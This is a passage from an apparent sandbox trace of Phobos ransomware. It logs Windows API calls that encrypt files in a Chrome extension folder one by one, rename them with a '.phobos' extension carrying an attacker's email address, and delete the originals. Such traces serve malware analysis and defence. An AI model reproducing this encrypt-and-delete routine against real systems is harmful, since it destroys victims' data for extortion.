data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.889] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.889] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.889] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3a258, lpOverlapped=0x0) returned 1 [0161.904] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a260, dwBufLen=0x3a260 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3a260) returned 1 [0161.905] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3a260, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3a260, lpOverlapped=0x0) returned 1 [0161.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0161.910] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.910] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0161.910] CryptDestroyKey (hKey=0xa32d28) returned 1 [0161.910] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0161.910] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.910] CloseHandle (hObject=0x134) returned 1 [0161.910] CloseHandle (hObject=0x17c) returned 1 [0161.911] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js")) returned 1 [0161.913] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.914] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=52759) returned 1 [0161.914] CloseHandle (hObject=0x17c) returned 1 [0161.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js")) returned 0x2020 [0161.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.915] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.915] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.915] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.915] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce17, lpOverlapped=0x0) returned 1 [0162.178] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xce20, dwBufLen=0xce20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xce20) returned 1 [0162.178] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xce20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xce20, lpOverlapped=0x0) returned 1 [0162.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0162.180] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.180] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.180] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.180] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.180] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.180] CloseHandle (hObject=0x17c) returned 1 [0162.180] CloseHandle (hObject=0x134) returned 1 [0162.180] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_sender.js")) returned 1 [0162.181] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.181] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=139738) returned 1 [0162.181] CloseHandle (hObject=0x134) returned 1 [0162.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js")) returned 0x2020 [0162.182] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.182] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0162.182] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.182] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x221da, lpOverlapped=0x0) returned 1 [0162.320] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x221e0, dwBufLen=0x221e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x221e0) returned 1 [0162.321] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x221e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x221e0, lpOverlapped=0x0) returned 1 [0162.326] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0162.326] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.326] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.326] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.326] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.326] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.326] CloseHandle (hObject=0x134) returned 1 [0162.326] CloseHandle (hObject=0x17c) returned 1 [0162.326] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js")) returned 1 [0162.328] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.329] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=59) returned 1 [0162.329] CloseHandle (hObject=0x17c) returned 1 [0162.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html")) returned 0x2020 [0162.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.329] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.329] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.330] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0162.330] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.330] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3b, lpOverlapped=0x0) returned 1 [0162.330] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.330] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x40, lpOverlapped=0x0) returned 1 [0162.331] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0162.331] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.331] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0162.331] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.331] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0162.331] CryptDestroyKey (hKey=0xa327e8) returned 1 [0162.331] CloseHandle (hObject=0x17c) returned 1 [0162.331] CloseHandle (hObject=0x134) returned 1 [0162.332] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html")) returned 1 [0162.332] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0162.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.333] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2088) returned 1 [0162.333] CloseHandle (hObject=0x134) returned 1 [0162.333] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html")) returned 0x2020 [0162.333] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0162.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0162.333] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.333] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0162.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0162.333] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0162.333] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0162.333] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x828, lpOverlapped=0x0) returned 1 [0162.356] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830, dwBufLen=0x830 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830) returned 1 [0162.356] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x830, lpOverlapped=0x0) returned 1 [0162.357] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0162.357] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) 